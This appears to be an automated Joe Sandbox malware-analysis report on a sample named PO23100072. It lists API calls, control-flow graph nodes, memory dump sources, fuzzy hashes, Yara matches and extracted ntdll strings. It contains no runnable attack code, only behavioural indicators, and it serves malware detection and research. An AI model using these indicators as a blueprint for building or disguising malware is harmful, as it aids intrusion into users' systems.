                                                                • Instruction ID: 660091a205a2d0db395bb57869b68f2cdd9fa1ef2b2e1361a00240bfd5975b8e
                                                                • Opcode Fuzzy Hash: f8e9f84e3d2da3e69b045f8aeb1cd36d7c7cf43e141ac7a6654fbc58469fb55e
                                                                • Instruction Fuzzy Hash: 2E41E5B1C0071ACFEB24DFA9C8857CEBBB1BF88704F20816AD418AB251DB756946CF50

                                                                Control-flow Graph

                                                                APIs
                                                                • CreateActCtxA.KERNEL32(?), ref: 00E759C9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Create
                                                                • String ID:
                                                                • API String ID: 2289755597-0
                                                                • Opcode ID: 531e805443d5da68f70829b71b11c10795edef3be1c78a72c5332cba671f45ce
                                                                • Instruction ID: 0ffdbefec8facb038e6cf01b95a05169a7e04707a56a846543fbd6a6eba7fd60
                                                                • Opcode Fuzzy Hash: 531e805443d5da68f70829b71b11c10795edef3be1c78a72c5332cba671f45ce
                                                                • Instruction Fuzzy Hash: 4B41D3B1C0071DCFEB24DFA9C88479EBBB5BF88704F24816AD418AB251DBB56946CF50

                                                                Control-flow Graph

                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E7D747
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: bbd6593bbcb02195c5a59fdcd90f878b96a0d9de52d10e9198976d108698d3e7
                                                                • Instruction ID: 419f4014a605ef97f0202d586cfbfee18ec44cf577fa20a54349651ff787860f
                                                                • Opcode Fuzzy Hash: bbd6593bbcb02195c5a59fdcd90f878b96a0d9de52d10e9198976d108698d3e7
                                                                • Instruction Fuzzy Hash: A621E2B5900249DFDB10CFAAD984AEEBBF5FB48310F14801AE918B3250C378A955CF64

                                                                Control-flow Graph

                                                                APIs
                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E7D747
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: DuplicateHandle
                                                                • String ID:
                                                                • API String ID: 3793708945-0
                                                                • Opcode ID: 708da9ea23f218ec2e610994fcd411c18a8921b58122eb5a770dd1a667130b55
                                                                • Instruction ID: 1dbbed564f83de3f1b1248c67edc0c05330bc1f931c731b60549d575c30ec956
                                                                • Opcode Fuzzy Hash: 708da9ea23f218ec2e610994fcd411c18a8921b58122eb5a770dd1a667130b55
                                                                • Instruction Fuzzy Hash: 7621C4B5900249DFDB10CFAAD884ADEFBF9FB48310F14841AE918A3350D378A954CF65

                                                                Control-flow Graph

                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00E7B03E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 282885da9f8546ac896174907275eaf7134ca04c9b79d77d7d18b8cee292743d
                                                                • Instruction ID: c937b25f4d68363d6966d511893781f2fb084debccd0941e072fc3e85d7bb322
                                                                • Opcode Fuzzy Hash: 282885da9f8546ac896174907275eaf7134ca04c9b79d77d7d18b8cee292743d
                                                                • Instruction Fuzzy Hash: B811CDB5800249CFDB20DF9AD844BDEFBF4AB88324F14841AD529B7650D379A945CFA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475117606.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d5d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6352d42c8e9db30f56de66e69d854321b75d103fe2247cbee4eab2b35315b3d6
                                                                • Instruction ID: 2d58ac20a9ec0f2a4461a7b3ddf71b4a9c3e3be16d808f4027ad7202bcb43feb
                                                                • Opcode Fuzzy Hash: 6352d42c8e9db30f56de66e69d854321b75d103fe2247cbee4eab2b35315b3d6
                                                                • Instruction Fuzzy Hash: 2321F475504204DFDF14DF10D9C4B16BB66FB94326F24C169DC490B256C336E85ACAB2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475199614.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d6d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f2b6123c646b7ca6801f424bc15e58c17165d644dc7447dc858b9968aca8723
                                                                • Instruction ID: 13fd5eccfeb9f1c7b584caae492c875005b1e17befdfe9337bbd35d12cdf0bb6
                                                                • Opcode Fuzzy Hash: 0f2b6123c646b7ca6801f424bc15e58c17165d644dc7447dc858b9968aca8723
                                                                • Instruction Fuzzy Hash: E921F575A04304EFDB05DF10E9D4B25BB66FB88314F24C56DD8494B296C376D846CA71
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475199614.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d6d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 443d0ef39ff78c5d270a1017057eef64ce3c5fd9acba6c921bc101e8d3b61519
                                                                • Instruction ID: 51131b75c87d93444eebebf5723605abeaeb933bfe4e1826e47364906d8a4450
                                                                • Opcode Fuzzy Hash: 443d0ef39ff78c5d270a1017057eef64ce3c5fd9acba6c921bc101e8d3b61519
                                                                • Instruction Fuzzy Hash: D521D075A04344DFDB14DF14E984B26BB66FB88314F24C569E84A4B286C33AD847CAB2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475199614.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d6d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3a76df670dba6bf0ffeccdd8b2344c0230063e4295628ec7b628d047c29b2a53
                                                                • Instruction ID: f3aea6d47bb46461ee73aa71b0eb2ea470cc2bdcff53788ad34d1f3c2aa4bf44
                                                                • Opcode Fuzzy Hash: 3a76df670dba6bf0ffeccdd8b2344c0230063e4295628ec7b628d047c29b2a53
                                                                • Instruction Fuzzy Hash: B32162755093C08FCB12CF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475117606.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d5d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                • Instruction ID: 4becf075dbd65c77d22c55d7ca7b4cc4e114c7cfb98662036e86d0491461e18f
                                                                • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                • Instruction Fuzzy Hash: EB11CD76504240CFCF15CF00D5C0B16BF62FB94325F28C2A9DC490A256C33AE85ACBA1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475199614.0000000000D6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d6d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                • Instruction ID: 77605c5d9ce90de15bcc21b5e35ba8591f94245fc7b36217ec9702cab373a161
                                                                • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                • Instruction Fuzzy Hash: 8611DD75A04280DFCB11CF10D5D0B15FBB2FB88324F28C6ADD8494B296C33AD84ACB61
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475117606.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d5d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1475117606.0000000000D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D5D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_d5d000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1478058544.0000000000E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_e70000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:

                                                                Execution Graph

                                                                Execution Coverage:1.2%
                                                                Dynamic/Decrypted Code Coverage:5%
                                                                Signature Coverage:9.3%
                                                                Total number of Nodes:140
                                                                Total number of Limit Nodes:9

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 334 4173a3-4173cc call 42f083 337 4173d2-4173e0 call 42f683 334->337 338 4173ce-4173d1 334->338 341 4173f0-417401 call 42da03 337->341 342 4173e2-4173ed call 42f923 337->342 347 417403-417417 LdrLoadDll 341->347 348 41741a-41741d 341->348 342->341 347->348
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417415
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 354 42c283-42c2bf call 404673 call 42d4f3 NtClose
                                                                APIs
                                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C2BA
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Close
                                                                • String ID:
                                                                • API String ID: 3535843008-0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 368 17e2b60-17e2b6c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 370 17e2df0-17e2dfc LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 369 17e2c70-17e2c7c LdrInitializeThunk
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00413C3A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: A34E618M$A34E618M
                                                                • API String ID: 1836367815-3667986552

                                                                Control-flow Graph

                                                                APIs
                                                                • PostThreadMessageW.USER32(A34E618M,00000111,00000000,00000000), ref: 00413C3A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: MessagePostThread
                                                                • String ID: A34E618M$A34E618M
                                                                • API String ID: 1836367815-3667986552

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 160 42c5f3-42c637 call 404673 call 42d4f3 RtlFreeHeap
                                                                APIs
                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C632
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID: `A
                                                                • API String ID: 3298025750-2149027389

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 305 417423-41743a 306 417440-41744a 305->306 307 4173f6-417401 306->307 308 41744c-41747f 306->308 310 417403-417417 LdrLoadDll 307->310 311 41741a-41741d 307->311 308->306 313 417481-4174ac 308->313 310->311 314 417512-417513 313->314 315 4174ae-4174c3 313->315 317 417501 315->317 318 4174c5-4174ce 315->318 319 4174d1-417500 318->319 320 41750e 318->320 319->317 321 417510 320->321 322 417514-41752b call 42f0e3 320->322 321->314 326 41752d-41755e call 42f0e3 call 42b263 322->326 327 41755f-41757f call 42b263 322->327
                                                                APIs
                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417415
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Load
                                                                • String ID:
                                                                • API String ID: 2234796835-0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 349 42c5a3-42c5e4 call 404673 call 42d4f3 RtlAllocateHeap
                                                                APIs
                                                                • RtlAllocateHeap.NTDLL(?,0041E1BE,?,?,00000000,?,0041E1BE,?,?,?), ref: 0042C5DF
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocateHeap
                                                                • String ID:
                                                                • API String ID: 1279760036-0

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 359 42c643-42c67c call 404673 call 42d4f3 ExitProcess
                                                                APIs
                                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,6104CAEF,?,?,6104CAEF), ref: 0042C677
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_PO23100072.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExitProcess
                                                                • String ID:
                                                                • API String ID: 621844428-0

                                                                Control-flow Graph

                                                                control_flow_graph 364 17e2c0a-17e2c0f 365 17e2c1f-17e2c26 LdrInitializeThunk 364->365 366 17e2c11-17e2c18 364->366
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID:
                                                                • API String ID: 2994545307-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-2160512332
                                                                Strings
                                                                • Invalid debug info address of this critical section, xrefs: 018154B6
                                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0181540A, 01815496, 01815519
                                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154CE
                                                                • Critical section debug info address, xrefs: 0181541F, 0181552E
                                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018154E2
                                                                • Thread identifier, xrefs: 0181553A
                                                                • Address of the debug info found in the active list., xrefs: 018154AE, 018154FA
                                                                • double initialized or corrupted critical section, xrefs: 01815508
                                                                • corrupted critical section, xrefs: 018154C2
                                                                • undeleted critical section in freed memory, xrefs: 0181542B
                                                                • 8, xrefs: 018152E3
                                                                • Thread is in a state in which it cannot own a critical section, xrefs: 01815543
                                                                • Critical section address., xrefs: 01815502
                                                                • Critical section address, xrefs: 01815425, 018154BC, 01815534
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                • API String ID: 0-2368682639
                                                                Strings
                                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01812506
                                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01812409
                                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018124C0
                                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018122E4
                                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01812602
                                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0181261F
                                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01812498
                                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01812412
                                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018125EB
                                                                • @, xrefs: 0181259B
                                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01812624
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                • API String ID: 0-4009184096
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                • API String ID: 0-2515994595
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                • API String ID: 0-1700792311
                                                                Strings
                                                                • VerifierDlls, xrefs: 01828CBD
                                                                • VerifierDebug, xrefs: 01828CA5
                                                                • HandleTraces, xrefs: 01828C8F
                                                                • VerifierFlags, xrefs: 01828C50
                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01828A3D
                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01828A67
                                                                • AVRF: -*- final list of providers -*- , xrefs: 01828B8F
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                • API String ID: 0-3223716464
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                • API String ID: 0-1109411897
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-792281065
                                                                Strings
                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 017F9A2A
                                                                • apphelp.dll, xrefs: 01796496
                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 017F9A01
                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017F99ED
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017F9A11, 017F9A3A
                                                                • LdrpInitShimEngine, xrefs: 017F99F4, 017F9A07, 017F9A30
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                • API String ID: 0-204845295
                                                                Strings
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018121BF
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01812180
                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0181219F
                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01812178
                                                                • SXS: %s() passed the empty activation context, xrefs: 01812165
                                                                • RtlGetAssemblyStorageRoot, xrefs: 01812160, 0181219A, 018121BA
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
